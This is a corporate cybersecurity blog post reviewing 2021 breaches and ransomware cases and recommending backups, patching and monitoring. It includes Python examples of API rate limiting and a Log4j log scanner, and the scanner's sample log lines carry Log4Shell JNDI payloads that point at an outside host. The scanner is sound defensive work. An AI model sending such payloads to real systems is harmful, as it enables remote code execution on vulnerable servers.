Cyber security recommendations for 2022: how to not repeat mistakes from 2021?

2022 01 10

Authors: Giedrius Saulėnas, Agnė Marija Bučytė

The importance of cybersecurity grows rapidly every year, both in society and in the business sector. According to the Identity Theft Resource Center (ITRC), data breach events globally increased by 17% when comparing January-September 2021 with the same months of 2020.

At the end of 2021, IT professionals gave in-depth attention to a critical zero-day vulnerability in a widely used software component, Log4j. Delayed software updates and poorly maintained system components give cyber attackers opportunities to misappropriate sensitive information and damage internal systems. Events such as the emergence and widespread exploitation of the Log4j vulnerability reaffirm that cyber threats are rising.

Ideally, companies should secure their infrastructure and systems before a cyber-attack occurs. With that in mind, in this blog post we look at some of the highest-profile cyber-attacks of 2021 worldwide and present recommendations that can help prevent cyber-attacks on your organisation or reduce the damage they cause.

Ransomware attacks – a growing threat to enterprises

Ransomware is malicious software that blocks access to a device or threatens to expose private information unless monetary demands are met. It is one of the biggest cyber threats to organizations worldwide. Cybersecurity Ventures has predicted that ransomware damage will cost up to 265 billion USD by 2031.

According to the Sophos State of Ransomware 2021 report, in 2020 data was not encrypted in 3% of ransomware attacks. In 2021, about 7% of attacks did not involve data encryption, yet a ransom was still demanded. In other words, the criminals do not bother to encrypt the data: they pressure victims with the potential fines and reputational losses of a data breach and demand a ransom in exchange for not publishing the data.

In May 2021, the American oil pipeline operator Colonial Pipeline suffered a significant cyber-attack by a Russian hacker group linked to DarkSide. The pipeline, which transports about 100 million gallons of fuel per day, was shut down temporarily for the first time in 57 years to contain the attack and prevent the attackers from reaching specific parts of the pipeline. The hackers had stolen over 100 gigabytes of data and demanded a ransom worth 4.4 million USD. Colonial Pipeline paid the hackers a massive sum. Although the Department of Justice helped recover part of the ransom, the attack's impact led to long lines at gas stations and higher fuel prices.

Typically, the details of attacks on this scale remain unknown. In the Colonial Pipeline case, it is suspected that the hackers obtained a username and password and connected to an account used for remote access via VPN. It is still uncertain how the attackers obtained the login credentials; there is speculation that they may have been leaked on the Dark Web. Furthermore, two-factor authentication was not enabled to protect the account.

Another huge cyber-attack in May 2021 hit JBS, an American company and the largest beef supplier in the world. After a ransomware attack, JBS paid the hackers an 11 million USD ransom, which only proves that cyber-attacks can cause massive financial losses. Even though experts do not recommend paying a ransom to attackers, some companies have no other choice because they lack the technical means, such as backups, to recover from a hack. That was also the case for JBS.

What can we learn from such ransomware attacks? 

Organisations can draw several recommendations from the incidents above:

  • Make periodic backups of critical systems. If data gets encrypted, restoring it from a backup is the best option. Remember that it is essential to test backups occasionally to ensure that the restoration process runs smoothly.
  • Ensure your systems are patched. The more vulnerabilities there are in public-facing systems or the internal network, the easier it is for ransomware gangs to initiate an attack.
  • Follow the defense-in-depth security principle. The more security layers there are, the harder it is for an attacker. Advanced security defense tools also help to defend against and investigate attacks.
  • Train employees periodically about cyber security risks; this is highly recommended.

Misconfiguration and vulnerabilities lead to high losses 

Improperly configured or outdated software can compromise the confidentiality, integrity, and availability of data. If sensitive data leaks because of misconfiguration or existing vulnerabilities, an organization might suffer high losses.

In June 2021, the LinkedIn incident, in which data on more than 90% of users was exposed, showed what losses software weaknesses can cause. Hackers performed the breach via an API and leaked data on 700 million LinkedIn users, including email addresses, full names, phone numbers, addresses, etc. Attackers could use the obtained details to craft targeted phishing attacks or even commit identity theft. While this situation did not stem directly from an unpatched system or any serious misconfiguration, it is still an unwanted incident. The dataset was collected by scraping the LinkedIn API. If the API had had rate limiting, or if only a person's contacts could view their data, such an incident would not have happened. It is not the first time LinkedIn has suffered such a misfortune, but hopefully it is the last.
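As an added illustration (not LinkedIn's code), the snippet below models a profile endpoint with the two safeguards the paragraph names: a per-client sliding-window rate limit and a contacts-only authorization check. The profiles, contact lists, and the scraper that walks profile ids at 100 requests per second are constructed for the example.

```python
from collections import deque

# Constructed sample data: profile id -> (name, set of contact ids)
PROFILES = {
    1: ("Alice", {2, 3}),
    2: ("Bob", {1}),
    3: ("Carol", {1}),
    4: ("Dave", set()),
}

class SlidingWindowLimiter:
    """Allow at most `limit` calls per `window` seconds for each client key."""
    def __init__(self, limit: int, window: float):
        self.limit, self.window = limit, window
        self.calls = {}   # key -> deque of call timestamps inside the window

    def allow(self, key: str, now: float) -> bool:
        q = self.calls.setdefault(key, deque())
        while q and now - q[0] >= self.window:   # drop calls that left the window
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True

class ProfileApi:
    def __init__(self, limit: int = 20, window: float = 60.0):
        self.limiter = SlidingWindowLimiter(limit, window)

    def get_profile(self, requester: int, target: int, now: float):
        """Return (status, data): 429 = rate limited, 403 = not a contact, 404 = unknown."""
        if not self.limiter.allow(str(requester), now):   # limit checked first, before any lookup
            return 429, None
        entry = PROFILES.get(target)
        if entry is None:
            return 404, None
        name, contacts = entry
        if requester != target and requester not in contacts:
            return 403, None   # only a person and their contacts may read the record
        return 200, {"id": target, "name": name}

def simulate_enumeration(api: ProfileApi, scraper_id: int, ids: range):
    """Constructed scraper: walks profile ids at 100 req/s; returns a count per status."""
    outcomes = {}
    for i, pid in enumerate(ids):
        status, _ = api.get_profile(scraper_id, pid, now=i * 0.01)
        outcomes[status] = outcomes.get(status, 0) + 1
    return outcomes
```

With the default limit of 20 requests per minute, an enumeration of 100 ids yields only 403/404 responses for the first 20 calls and 429 for the rest, so the scraper never reads a single record.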

In October 2021, another unexpected cyber incident occurred on the Twitch platform and led to the exposure of confidential data. The breach revealed more than 100 GB of Twitch data, including its source code. Hackers managed to locate a server misconfiguration that allowed unauthorized access. The streaming platform faced a lot of backlash when the leak uncovered how much some top creators earn annually. The attack damaged the platform's reputation, and Twitch is now considered insecure and unreliable.

In December 2021, IT specialists discovered zero-day vulnerabilities in the Log4j library. The Log4j Java library is used in Apache software and is also a component of many open-source products, so the scale of this critical vulnerability is enormous, with most organizations affected. With a simple payload, criminals can exploit the remote code execution (RCE) vulnerability, run malicious code on a remote system, and steal data. Although the vulnerability is still new, organisations need to ensure their systems are patched and safe.

What are the key takeaways from the examples mentioned above? 

We strongly advise taking the following actions to lower the risk of such incidents:

  • Perform log monitoring to spot abnormalities in the network.
  • Configure the firewall to allow access only to the users who need it.
  • Periodically, semi-annually or more frequently, perform penetration testing, risk assessment, and security assessment activities.
  • Encrypt and back up sensitive data.
  • Apply released security patches promptly.
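As an added example (not the post's own tooling), the log-monitoring bullet above can be made concrete for the Log4j vulnerability described earlier: a scanner that reads web access log lines and flags any Log4j lookup expression, such as `${jndi:...}`, appearing in client-controlled fields (request line, Referer, User-Agent), where such syntax has no legitimate place. The log lines, IP addresses, and timestamps are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the Apache/nginx "combined" log format.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2021:10:01:05 +0000] "GET /login HTTP/1.1" 200 210 "-" "${jndi:ldap://198.51.100.9/a}"
203.0.113.9 - - [12/Dec/2021:10:01:09 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.9%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.5 - - [12/Dec/2021:10:02:00 +0000] "GET /about HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
                     r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')
# Log4j lookup syntax: `${` followed by a lookup name and a colon, e.g. ${jndi: or ${env:
LOOKUP_RE = re.compile(r'\$\{\s*[a-z0-9_]+\s*:', re.IGNORECASE)

def normalize(field: str) -> str:
    """URL-decode twice so that encoded and double-encoded lookups become visible."""
    return unquote(unquote(field))

def scan_line(line: str):
    """Return a list of (source_ip, field_name, matched_text) for suspicious lookups."""
    m = LINE_RE.match(line)
    if not m:
        return []   # lines that do not parse are skipped here; a real deployment should count them
    hits = []
    for name in ("request", "referer", "agent"):
        value = normalize(m.group(name))
        for lk in LOOKUP_RE.finditer(value):
            hits.append((m.group("ip"), name, value[lk.start():lk.start() + 40]))
    return hits

def scan_log(text: str):
    """Scan every line of a log and collect all hits."""
    return [hit for line in text.splitlines() for hit in scan_line(line)]

if __name__ == "__main__":
    for ip, field, snippet in scan_log(SAMPLE_LOG):
        print(f"ALERT src={ip} field={field} match={snippet!r}")
```

On the sample log the scanner raises two alerts, one for the lookup in the User-Agent header and one for the URL-encoded lookup in the query string, while the ordinary browser requests pass silently.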

Cyber security recommendations for 2022 

The growing number of cyber incidents makes companies more aware of the risks they might face. However, hackers put even more effort into improving their cyber-attack tactics, techniques, and procedures (TTPs).  

In cybersecurity, prevention is crucial. It is essential to prioritize your systems' security, have the needed security procedures in place, and perform periodic security assessments.

Employee education is another critical component of managing the risk of experiencing a cyber incident. Phishing is a popular attack vector, and educated users are less likely to be deceived by cybercriminals.  

Finally, enterprises should learn from the mistakes of others rather than their own. It is crucial to decide in advance how to keep customers' personal data and company proprietary data secure, and not to delay the needed security actions until it is too late.

If you are looking for efficient ways to ensure information security in your organisation, the Baltic Amadeus team is more than happy to help you out.